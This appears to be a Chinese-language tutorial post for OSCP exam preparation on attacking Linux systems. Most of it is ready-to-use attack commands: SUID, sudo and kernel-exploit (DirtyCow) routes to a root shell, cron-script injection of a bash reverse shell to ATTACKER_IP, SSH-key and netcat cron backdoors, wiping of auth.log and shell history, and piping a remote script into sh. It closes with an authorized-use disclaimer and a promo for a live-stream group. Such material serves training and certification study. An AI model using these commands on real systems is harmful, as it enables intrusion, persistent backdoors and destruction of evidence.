OSCP渗透实战(第二期):Linux系统攻防与权限提升完全指南
OSCP渗透实战(第二期):Linux系统攻防与权限提升完全指南
“Try Harder”不仅是口号,更是渗透测试者的生存法则。上期揭秘OSCP黄金认证的价值,本期将带你拆解Linux系统渗透的致命武器库。
1. Linux信息收集:渗透前的“战场侦察”
目标:全面掌握目标系统环境,定位攻击入口。
1.1 系统核心信息收集
-
操作系统与内核版本:
uname -a # 内核版本、主机名、架构 cat /etc/*-release # 发行版详细信息 cat /proc/version # 内核编译信息
关键点:内核版本决定漏洞利用可行性(如DirtyCow需内核≤4.8.3)。
-
环境变量与敏感路径:
env # 查看环境变量,可能含API密钥 find / -writable -type d 2>/dev/null # 查找可写目录
1.2 权限漏洞扫描
-
SUID/SGID文件挖掘:
find / -perm -u=s -type f 2>/dev/null # 查找SUID文件 find / -perm -g=s -type f 2>/dev/null # 查找SGID文件
高危案例:若发现
find
命令具SUID权限,直接提权:find . -exec /bin/sh -p \; -quit # 启动root shell
-
定时任务漏洞利用:
cat /etc/crontab # 查看系统定时任务 ls -la /etc/cron.* # 检查自定义任务
攻击逻辑:若任务脚本可写,注入反向Shell代码:
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /path/to/task.sh
2. 权限提升:从普通用户到Root的“致命跳跃”
核心思路:利用配置错误、内核漏洞或服务缺陷突破权限壁垒。
2.1 内核漏洞提权(最高危手段)
- 漏洞识别与利用流程:
- 确认内核版本:
uname -a
- 搜索匹配漏洞:
searchsploit linux kernel 3.13
- 编译执行EXP(以DirtyCow为例):
gcc -pthread dirty.c -o dirty -lcrypt # 编译漏洞利用代码 ./dirty mypassword # 创建root权限账户
- 确认内核版本:
2.2 Sudo权限滥用
- 检测可提权的Sudo命令:
经典提权场景:sudo -l # 查看当前用户可执行的特权命令
- Vi/Vim编辑器:
sudo vim -c ':!/bin/sh'
- Python解释器:
sudo python -c 'import os; os.system("/bin/sh")'
- Find命令:
sudo find / -exec bash -p \;
- Vi/Vim编辑器:
3. 后渗透阶段:权限维持与痕迹清理
目标:建立持久访问通道,隐匿攻击行为。
3.1 后门部署技术
- SSH后门:
echo "ssh-rsa AAAAB3Nza... attacker@kali" >> ~/.ssh/authorized_keys # 添加公钥
- Cron持久化:
(crontab -l; echo "*/5 * * * * nc ATTACKER_IP 4444 -e /bin/sh") | crontab - # 每5分钟反弹Shell
3.2 日志清除(谨慎使用)
# 清除当前用户历史记录
shred -zu ~/.bash_history # 覆盖并删除
# 清理auth.log(需root)
echo "" > /var/log/auth.log
4. 实战工具推荐:OSCP考生必备利器
工具名称 | 用途 | 命令示例 |
---|---|---|
LinPEAS | 自动化扫描提权路径 | curl -L https://.../linpeas.sh | sh |
Linux Exploit Suggester | 内核漏洞匹配 | ./les.sh -k 3.13 |
pspy | 监控进程无需root权限 | ./pspy64 |
5. 技术交流与实战直播预告
私信我加入技术交流群,本周六、周日群内将直播实战演练两台OSCP PG靶场!
- 直播内容:
- 从信息收集到权限提升的全流程演示
- OSCP考试高频漏洞复现(如缓冲区溢出、SUID提权)
- 互动答疑,解决你的实战难题
- 适合人群:
- OSCP备考者
- 渗透测试初学者
- 安全技术爱好者
下期预告
Windows权限提升终极指南:
- 注册表后门植入(Image File Execution Options劫持)
- MS17-010永恒之蓝实战复现
- Pass-the-Hash攻击内网域控
“从一台Windows主机到掌控整个域,你只差三个漏洞的距离。”
声明:本文技术仅用于授权渗透测试,严禁非法入侵!